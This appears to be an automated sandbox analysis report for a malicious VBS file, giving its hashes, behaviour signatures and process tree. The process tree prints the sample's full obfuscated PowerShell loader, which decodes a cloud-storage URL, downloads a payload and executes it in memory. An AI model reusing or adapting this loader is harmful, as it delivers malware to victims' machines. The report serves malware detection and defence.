Overview

overview

8

Static

static

1

f0faf14409...8d.vbs

windows7-x64

8

f0faf14409...8d.vbs

windows10-2004-x64

8

Analysis

  • max time kernel
    122s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    18/04/2024, 01:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d.vbs

  • Size

    210KB

  • MD5

    5c629502f5f297b1473c1288daef4815

  • SHA1

    c1339b52ef4f18e1bc269d928bbf85387d17b3e4

  • SHA256

    f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d

  • SHA512

    e4f7951973b8a19231acd3afca20ea0a4dc479d039cef2a5634cacefad9261006bfbea7288d444725cfb7e8e5aa9f33891779d68fa393fe0b60404b7a6664ec2

  • SSDEEP

    6144:iYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfcqNZ:X2dOtzRn

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f0faf14409482a52de11a52384c0a7dd0067f13f7063d61fe400e0a5cbf5df8d.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:3044
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Virksomhedskundes = 1;$Urfolks='Substrin';$Urfolks+='g';Function Mediaevalize($Lejen){$Kvintetten=$Lejen.Length-$Virksomhedskundes;For($Lapperiet=5; $Lapperiet -lt $Kvintetten; $Lapperiet+=(6)){$Electrizable+=$Lejen.$Urfolks.Invoke($Lapperiet, $Virksomhedskundes);}$Electrizable;}function Bryllupsgaven($Patosens){& ($Lutz) ($Patosens);}$Cater=Mediaevalize 'AcetoM.verioRedimzJ,rrai Ribal Nerol Ki,haForsa/ Drib5 Anam.Mult 0 Bver deno(TrafiWT rbaiRude nSotoldArabio E.edwT.lexs Balk VirkeN .verTErhve hyste1Unboh0 .isi. Unco0 ,bdi;Bovls blaffW ilociAmorfn Velo6forbu4Tilsa;Natur Basswx Bagh6S,ocr4Linje; Trag Gynecr Exciv.crat:Balli1Tagal2Konto1 Li,t. Kuwa0Demar)R.spe DeliGListeeMachic Havrkacetoo Dis /,tpar2Sh,pw0Const1Juste0Fastp0Pishi1u.kld0Skryd1U,cia AlainFSend iKursvrDroite Selsf VandoS bylxMisaw/Rad o1Servi2Dunst1Pas,e. Dute0P rqu ';$Pldere=Mediaevalize ' IndkUWedelsUs,rme,owdyrLarin-ReechAUnsangBelgne KitcnPassatudfrl ';$Prajer=Mediaevalize 'Rest,h IndstPolemtWycl p TablsSwowe: Svrd/ Tekk/psykidNemalr Carui Jallv WarseMater.AkkorgOc looArthroDurangGladil,etrieChe.r.SkytscBengtoaltrumomd,e/UnderuM.nopcr,der?GenneeK ravxForrapsysteoTemadrBuccit Klag= Su,kd paahoLegatwFletfnHjemglA.ernoSkirlaPagandAdopt&SterniSlovad Sand=Mdere1Edibiremendf.erryXC oppsAarh.O DissSBeerbCP.ychaKotwa4trykfYRhythpKnal p wan,cUnifolAlkovEin.coICrepibgi.thKMange6Forsoenotocudisg,RK.desuMaxil_AdmeaH Phys2 Hype0HvalfP .yredVerifJUdsulHStude7 Be.o ';$Synchondrosially=Mediaevalize 'Swin.>Excog ';$Lutz=Mediaevalize 'Indogi ,alaeMyeloxPa.se ';$Tilvejebringes = Mediaevalize 'CollaeDisancMaskihSjipnoCicer Needl%Anoina iskep WorkpVandmdUgesta Par,tStregaRu.tn% For.\ GardMCeropiAnt.rl MacroGabonsAd,es.HvoribEt,anlBent,aBodyl Noiso&Go se& xyha Tosk,e Antic ellhRapidoInd.r Termi$Krost ';Bryllupsgaven (Mediaevalize 'Posr $ByrthgTet,rl Sndeo,fstnbWa seaBr avl.arri:GolfeBCottaeDerivs Kon,kCar oi Malfn SnifnRevele BrottTrons=Forsk(BardecJyskhmkaj.adPilot Frerp/ VuggcOnera Archb$PelseTAlgoriDidyml Ki kvGa cheSkovrjFrs,ee.ebleb Akkur aaskiUnsolnOverigDy,klec slusExcu,)be.or ');Bryllupsgaven (Mediaevalize 'F ren$IntrogSmudslDiantoUnlifbfifleaKnighlBlueb:Te,tiFCamphlQurshadol.as EftekLecane Udsup stejo ,ostsUnreatOveraeKrognnTris,=I,dte$SlovePskru,rLimuaa.laahjCharteImmunr Obla. FolksWaganpE pepl.ewaki absotTekst(Ind,a$UnsquS FostypolygnProfic.lecthra,ulotonednSpadedForhar ,ereoAutocssangsiKap laEfterlStop lTabley Marg)Filan ');$Prajer=$Flaskeposten[0];Bryllupsgaven (Mediaevalize 'Kul l$Arke g ThealImau.oWholibbedeaa Empul Spie:IntroSFo.eseVasoemT.dlnbclotul,ugeneMu,ti=AgripNSkru e H zew Tog,-G telOregiobspdbrjFylkee,ucofc RometDo.ns SkattSR paryDamsps.ogtrt RadeeConqumOttar.YelpeNBisameMargitUdfal.T.rteWIndkoeBalsab SolfCI.dfllKa.teiTo.vie StaknVarmetAfgre ');Bryllupsgaven (Mediaevalize ' Ad i$FrateSAs.rieHauntmFiskebCalablSonnee King.op prHLnproe,pflaaForgodElevpeIncharHringsEjend[Sphen$PolitPPignolKicksd Frere MegarWhorreKondu] Misr=Forre$,ultiCAlphoaUnivetLoftseForskrBrode ');$Diftongeringen=Mediaevalize 'VigtiS.lndeeBequemKlem.bUn,lulMinueebrudf.Haf.iDH,epsoSkyhowB.shbnAngrelBrkdeoUnctiaF,brodRegtaF ,onki.drtslRutebe.egne( ord$PleurP Hvisr BeauaSt vejGrapheKraftrRetsp,Direk$BenfrUra conSto ks ,lseu DatabDrgtimSm syiHin,isToutes StudiOm osvAcroseContr)Revap ';$Diftongeringen=$Beskinnet[1]+$Diftongeringen;$Unsubmissive=$Beskinnet[0];Bryllupsgaven (Mediaevalize ' Stra$FormigGuvaclMeet o OverbAffunaUterol Clor:HabilG Oranls.lehuneweleE,ceim.fsviaandennD.oni= Fa e(selskTPervae ,istsLi.oxtMusic-Fo giP Rec aVirk,tOrienhInfor S.st$KommaUN.zilnMonitsPseudu VoldbA.omimRelatiTeksts.cintsOve giretf.vMuseuePyrop)Nauti ');while (!$Glueman) {Bryllupsgaven (Mediaevalize 'Ni,ro$UdskrgFunktlNonmyoorlo bPaynia Co nlPreim:BetalFWindrlStandiRad.umForamf.idnelsydsla SubomSenge=Helge$,etaltGer,nr PhyluSubmied sha ') ;Bryllupsgaven $Diftongeringen;Bryllupsgaven (Mediaevalize ' StanSIllittHukbaa .talrTavletOverd-EnantSabe,alOverfe.istre NedrpZon s Who e4 Wast ');Bryllupsgaven (Mediaevalize 'Va.df$ Babog Su.plTrsk.o Fav.bNonthaAnti,lPreed:ThiosG AndelAdstiu nreeOutstm elgra,aplonParce= Rveh(Bin.eTStic e.amsisNonaftCompa-TonekP,ivalaGra.itAcrolhPre.n Blady$ OptrUAbc,rnAns,asSenoruFo,edb Medhm.ootliUhyresAf.visRemiliCotenv Fr.te,hris) Svej ') ;Bryllupsgaven (Mediaevalize 'Macka$Kem.lgHusholU.skro KnudbafledaSkol l Bas,:OblatHNabobeSkovvnConcuvBilleiEspals Li mnPresciComplnAflgggTidsbeAntidrWhingnlooseeSvrmesPlaty=Armb.$ErythgPros lDom no P ngbSkuffa Perilm,cro:Dec.aS Haa mProfiiStylosSouthk.ektoe,ammedC,gnaeFranksRadio+Skilr+Logco%b nef$ nmerFbespolHjlpeaDriv.sErgsvkHreapeClimapeks.mo Earts FaldtBronzeTurkinIna c.Bajerc Skalo .vovuDoemtnKompltexcur ') ;$Prajer=$Flaskeposten[$Henvisningernes];}Bryllupsgaven (Mediaevalize 'Liman$.ompegSudanlHomoloImmatbAce aaPoly,lMezzo:NglepPSvagslBagh.aNomadnSulphiPr grmVrdimeSeleftSubsirBrandeLlin.sSorte P epl=Param G.ewtGLevereDemoktRabbi- MeteCUncifoSkaernAf.lat R,gieTetran,ldertsoile .arth$displURensenBibl.sAntanu WantbChlormanoasiAfslasPinwhs ExtriSttevvStilleRed,i ');Bryllupsgaven (Mediaevalize ' Ph y$Plexig Podsl TankoweathbPeri,aD,sillA par:AttriMkulmoyMartirAscidr metaaLaw.es.nalc Prote= Mayo Recip[ Afl,SCajonyGeorgsNonchtDemiue PrivmB,ntm.LumbaC elgeoN.dgrn R hnv.domeeDrgforCandltBruge]Molek:douve:wytedFIrre.rKaffeoMunnomU solBSlumma Ludds R ete,entr6Desig4 BarySIsohetKon,lrSaldaiEtiken ImpagV,ole(Statu$ P asPPledglAstriaVolubn ondiiS,ragm,olsjeOutbutStererStatse FiltsIn er)Opsen ');Bryllupsgaven (Mediaevalize 'Try k$NikkegSalvelGenioo Ka.kbInkluaRockelO.dde:CottoESupernListeuScattnCanoncValveiF,rgia utatFly,eiNico.oPromen ArthsAnima Under=Endem Forli[Str cSeleveyBlaass D.rit IniteCastemDeval.Fi skTEkspae,enyaxDishet Komp.UraneEDesegnHerlacBancao F.ngdSelskiUncapn UdsigGtef,]Cent.: Stal:,enziA SlurSUnposC RetiIRe geI Ungd.GaveaGUdsmueTidsttRigsvSLeishtGratirAbiotiSturnnPseu,gBrint( Glas$DecriMPhysiymilier .arvrSyphoaEmetisLiv.r)Dimer ');Bryllupsgaven (Mediaevalize 'Subid$Caverg ShowlP dopoUnguabbimilaVra,gl Patt:TilnrOBombepModt.vIconoaFrem,rPuppemSmitsnf.letiPortanK ntagSte fs nfor=Egenk$,riceESvi,gnReoriuFuglenElastcKannei lotsaObsc,tAnglii boreoCylinnSacchs Stif.S retsHus,luApprobfid.ssHobbytSmaabrPseu,iH,ndrnUnibigA reg(Hercu2Torpi9Isoan1L.vte0risfu4Ridde1Sammm,Term 2Print8Pendu8 Fris2P.aty4D.ift) .nab ');Bryllupsgaven $Opvarmnings;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2620
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Milos.bla && echo $"
        3⤵
          PID:2440

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2620-21-0x000000001B360000-0x000000001B642000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2620-22-0x0000000001C60000-0x0000000001C68000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2620-23-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2620-24-0x0000000002770000-0x00000000027F0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2620-25-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2620-26-0x0000000002770000-0x00000000027F0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2620-27-0x0000000002770000-0x00000000027F0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2620-30-0x0000000002770000-0x00000000027F0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2620-31-0x000007FEF5680000-0x000007FEF601D000-memory.dmp

      Filesize

      9.6MB

      Download